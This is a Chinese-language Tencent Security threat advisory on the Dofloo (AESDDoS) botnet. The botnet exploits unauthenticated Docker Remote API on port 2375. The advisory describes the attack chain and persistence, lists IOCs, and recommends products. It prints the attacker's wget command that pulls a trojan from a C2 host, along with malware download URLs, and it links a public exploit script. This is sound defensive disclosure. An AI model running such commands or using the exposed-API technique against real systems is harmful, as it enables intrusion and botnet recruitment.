产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器
2020-09-17 12:58:49
一、背景
腾讯安全威胁情报中心检测到Dofloo(AESDDoS)僵尸网络正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证,存在Remote API允许未授权使用漏洞且暴露在公网,导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。
云计算兴起后,服务器硬件扩展非常便利,软件服务部署成为了瓶颈,Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器,因而逐渐得到广泛应用。而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一,之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露(https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A)。此次Dofloo僵尸网络入侵系统后,会搜集系统敏感信息并加密上传,接收C&C服务器指令,执行各类DDoS攻击。
腾讯安全系列产品已支持检测Dofloo(AESDDoS)僵尸网络的最新变种,企业安全运维人员如果发现已经中招,可对照分析报告的详细内容,将攻击者下载安装的文件和启动项删除,再参考以下安全响应清单进行排查,修复Remote API允许未授权使用的漏洞,避免再次遭遇入侵。
腾讯安全系列产品针对Dofloo僵尸网络的响应清单:
应用 场景 |
安全产品 |
解决方案 |
威 胁 情 报 |
腾讯T-Sec 威胁情报云查服务 (SaaS) |
1)Dofloo僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics |
腾讯T-Sec 高级威胁追溯系统 |
1)Dofloo僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts |
|
云原生安全 防护 |
云防火墙 (Cloud Firewall,CFW) |
基于网络流量进行威胁检测与主动拦截,已支持: 1) Dofloo僵尸网络关联的IOCs已支持识别检测; 2) 检测Docker未授权访问漏洞利用攻击;
有关云防火墙的更多信息,可参考: |
腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) |
1) 已支持查杀Dofloo僵尸网络相关木马程序; 2) 已支持Docker Daemon 2375管理端口开启的风险项检测;
腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp |
|
腾讯T-Sec 安全运营中心 |
基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html |
|
非云企业安全防护 |
腾讯T-Sec 高级威胁检测系统 (腾讯御界) |
1) 已支持通过协议检测Dofloo僵尸网络与服务器的网络通信; 2) 检测Docker未授权访问漏洞利用攻击; 3) 检测DDoS攻击流量;
关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta |
更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/
二、详细分析
在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCP SYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。
获取容器列表:
针对运行状态的容器利用Docker EXEC执行木马下载命令:
wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7
被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。
Dofloo僵尸网络还会在从被感染系统窃取信息,包括操作系统版本,CPU型号、速度和类型。
通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。
使用AES算法对窃取的系统信息和命令和控制(C&C)数据进行加密。
此Dofloo变种能够发起各种类型的DDoS攻击,包括DNS、SYN,LSYN,UDP,UDPS,TCP和CC Flood。
IOCs
C&C
49.235.238.111:48080
175.24.123.205: 48080
IP
49.235.238.111
89.40.73.126
175.24.123.205
URL
http[:]//49.235.238.111[:]88/Linux2.7
http[:]//49.235.238.111/Lov.sh
http[:]//49.235.238.111/lix
http[:]//49.235.238.111/Verto
http[:]//49.235.238.111[:]88/NgYx
http[:]//49.235.238.111/linux-arm
http[:]//49.235.238.111/shre.sh
http[:]//89.40.73.126[:]8080/Linux2.7
http[:]//89.40.73.126/linux2.6
http[:]//89.40.73.126[:]8080/linux-arm
http[:]//89.40.73.126[:]8080/Linux2.6
http[:]//89.40.73.126[:]8080/YmY
http[:]//89.40.73.126[:]8080/LTF
http[:]//89.40.73.126[:]8080/NgYx
http[:]//89.40.73.126[:]8080/Mar
http[:]//89.40.73.126[:]8080/linux2.6
http[:]//89.40.73.126[:]8080/Flood
http[:]//175.24.123.205:88/Fck
MD5
Flood |
0579a022802759f98bfdf08e7dd16768 |
Linux2.7 |
0b0f1684f6791d9f8c44a036aa85a2cc |
lix |
9530e46caab834e1e66a108e15ea97ca |
linux-arm |
ca1f347447ddf7990ccd0d6744f3545d |
Linux |
05f28784a0da0c1e406d98c02dc7d560 |
arm |
34eeb9eaa65c4a062311a886dd0157f1 |
Fck |
df86da9e341c3a9822f30ac4eba11951 |
Lov.sh |
83caa873cee081162c417eb8dec4a351 |
Rze.sh |
48c910cd9a07404fbfb8bf52847e72c3 |
SHre.sh |
bb7cdf5707a857036cd41af4bafaed31 |
参考链接:
https://github.com/SPuerBRead/Docker-Remote-API-Exploit/blob/master/dockerAPI_Exploit.py
在线咨询
方案定制